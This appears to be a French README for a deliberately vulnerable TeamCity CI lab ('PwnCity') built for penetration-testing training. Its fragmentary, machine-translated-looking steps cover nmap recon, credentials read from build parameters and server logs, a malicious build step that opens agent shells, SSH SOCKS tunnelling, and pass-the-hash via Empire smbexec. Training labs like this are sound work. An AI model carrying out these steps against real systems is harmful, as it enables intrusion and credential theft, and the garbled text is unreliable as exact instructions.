
Environnement TeamCity CI volontairement vulnérable pour une formation pratique au test d'intrusion : reconnaissance, vol d'identifiants, élévation de privilèges et mouvement latéral.
Un environnement d'intégration continue TeamCity configuré de manière non sécurisée.
Travail en cours : Le code de déploiement arrive bientôt éventuellement .

Il peut y avoir plus d'un chemin à travers PwnCity, mais c'est celui que je présenterai le 24 février lors de la réunion du OWASP Sacramento Chapter.
Remarque : La sécurité opérationnelle est en grande partie ignorée ici car il s'agit d'une démo.
nmap -Pn -p- 52.234.0.18.
nmap 52.234.0.18 le fait paraître mort.nmap -Pn 52.234.0.18.


bob, mot de passe bobhacks?.
bob, naviguez vers Projects > SimpleMavenSample > Build > Settings.Parameters contient des identifiants.

ssh [email protected], et connectez-vous en SSH en tant qu'utilisateur à faibles privilèges.

Nous pourrions créer un tunnel depuis notre point d'appui initial. Savoir que RDP est ouvert sur deux agents de build nous permettrait de tenter de nous authentifier avec les identifiants que nous avons trouvés... mais ce n'est pas aussi amusant.
cat /home/dev/TeamCity/TeamCity/logs/teamcity-server.log | grep "Super user".

Administration > Projects > Create project, et obtenez un shell sur les agents de build.

cmd.exe/c %system.teamcity.build.checkoutDir%/launcher.bat
Identifiants choisis dans rockyou.txt.
PwnAgent01 a Microsoft Defender activé. Bien qu'il soit certainement encore possible de le contourner, l'étape de build malveillante que nous avons démontrée sera bloquée.



Cette section est simplement une collection d'extraits utiles à l'administration de l'environnement de laboratoire.
TeamCity pour accéder aux ressources locales ssh -D 9050 [email protected].proxychains4 xfreerdp /u:dev /v:10.0.0.6:3389.
... à côté de Run dans le menu, puis sur l'agent souhaité que vous ciblez. Si tout se passe bien, vous aurez un rappel de l'agent.

powershell/situational_awareness/network/portscan. Découvrez que 10.0.0.7 a 3389,445,139,135 tous ouverts.

bruno.powershell/lateral_movement/invoke_smbexec pour obtenir un beacon sur Bruno-PC via le hash NTML.
